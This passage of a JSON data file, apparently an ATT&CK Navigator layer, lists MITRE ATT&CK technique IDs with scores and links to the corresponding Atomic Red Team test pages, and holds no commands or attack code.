Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.001/T1137.001.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View 